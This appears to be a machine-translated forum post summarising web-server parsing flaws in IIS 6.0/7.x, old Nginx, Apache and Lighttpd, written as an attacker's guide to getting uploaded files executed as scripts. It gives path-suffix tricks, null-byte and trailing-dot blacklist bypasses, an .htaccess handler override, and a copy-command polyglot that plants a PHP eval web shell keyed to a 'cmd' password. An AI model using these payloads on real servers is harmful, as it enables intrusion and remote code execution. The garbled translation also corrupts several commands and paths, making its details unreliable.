Summary of Web Service parsing vulnerabilities such as IIS 6.0/7.0/7.5, Nginx, and Apache

[+] Microsoft IIS 6.0

Directory resolution:/xx. asp/xx.jpg can be replaced with any text file (e.g. xx.txt), and the text content is the backdoor code

IIS6.0 parses xx.jpg to an asp file.

Suffix resolution:/xx.asp;.jpg/xx. asp:. jpg (you need to capture the package and modify the file name here)

IIS6.0 will successfully resolve such suffix files to asp files.

(Webmaster comment: IIS6.0 analyzes the cause of the vulnerability. You can refer to a short article written by Luo Ge: Brief Analysis of IIS File name resolution vulnerability)

{/Xx. asp:. jpg files cannot exist in Windows.. jpg files are automatically removed, And/xx. asp}

(Webmaster comment: an error is found, but it is not allowed to exist. This path is called "NTFS data stream". For details, see IIS6's colon Upload Vulnerability and IIS6 Vulnerability (upload and use) comment below)

Default resolution:/xx. asa/xx. cer/xx. cdx

IIS6.0 default executable files besides asp include the three

(Webmaster comment: this is mainly because in the default IIS configuration, These suffixes are by default asp. so the execution permission and. asp is the same. You can delete the Suffix in the configuration to prevent security risks)

You can contact us to exploit the directory resolution vulnerability/xx. asa/xx.jpg or/xx. cer/xx.jpg or xx.asa424.jpg.

[+] IIS 7.0/IIS 7.5/Nginx <= 0.8.37

IIS 7.0/IIS 7.5/Nginx <= 0.8.37

When Fast-CGI is enabled by default, adding/xx. php to a file path (/xx.jpg) will resolve/xx.jpg/xx. php to a php file.

Common Use method: Combine a graph and a text file written into the backdoor code to write malicious text into the binary code of the image to avoid damaging the image file header and tail.

E.g. copy xx.jpg/B + yy.txt/a xy.jpg

######################################

/B is the binary [binary] mode.

/A is the normal image file in ascii mode xx.jpg

Yy.txt content <? PHP fputs (fopen ('Shell. php', 'w'), '<? Php eval ($ _ POST [cmd])?> ');?>

It means to write a content as <? Php eval ($ _ POST [cmd])?> File named shell. php

######################################

Find a place to upload xy.jpg, find the address of xy.jpg, and add/xx. php to the address to execute malicious text.

Then a Trojan shell. php password cmd is generated in the image directory.

[+] Nginx <= 0.8.37

When Fast-CGI is disabled, Nginx <= 0.8.37 still has the parsing vulnerability.

Add % 00. php after a file path (/xx.jpg) to resolve/xx.jpg % 00.php to a php file.

(Webmaster's comment: it has evolved from/test.jpg/x. php. For details, refer to: Ngnix Null Byte Remote Code Execution Vulnerability)

[+] Apache

Suffix resolution: test. php. x1.x2. x3

Apache will judge the Suffix from right to left. If x3 is a non-identifiable suffix, then determine x2 until the recognizable suffix is found. Then, the identifiable suffix is parsed.

Test. php. x1.x2. x3 will be parsed as php

Experience: php | php3 | phtml can be parsed by Apache

(Webmaster comment: for apache resolution vulnerabilities, refer to "Apache vulnerability suffix resolution Vulnerability ")

[+] Other available

In windows, xx.jpg [space] Or xx.jpg. These two types of files are not allowed to exist. If you name them like this, windows will remove spaces or dots by default, which can also be used!

When uploading data to a windows host, you can capture packets to modify the file name, add spaces or dots to the backend, and try to bypass the blacklist. If the upload is successful, the last vertex or space will be eliminated, in this way, you can get the shell.

I remember that Fck Php 2.6 had the space Bypass Vulnerability. {Not in Linux host. This type of file is allowed in Linux}

If. htaccess can be applied in Apache (when AllowOverride in the directory is set to All in the httpd. conf configuration file of Apache, apache will apply the configuration in. htaccess under the directory By sfasfas ),

And can be uploaded, you can try to write in. htaccess:

<FilesMatch mongoshell.jpg "> SetHandler application/x-httpd-php </FilesMatch>

Replace shell.jpgwith the file you uploaded. Then, the shell.jpg file can be parsed as a PHP file.

[+] Lighttpd

Xx.jpg/xx. php

[Add by El4pse]

PS: I am not sure I write it all right. If something is wrong or missing, please help me to correct it. Thank you.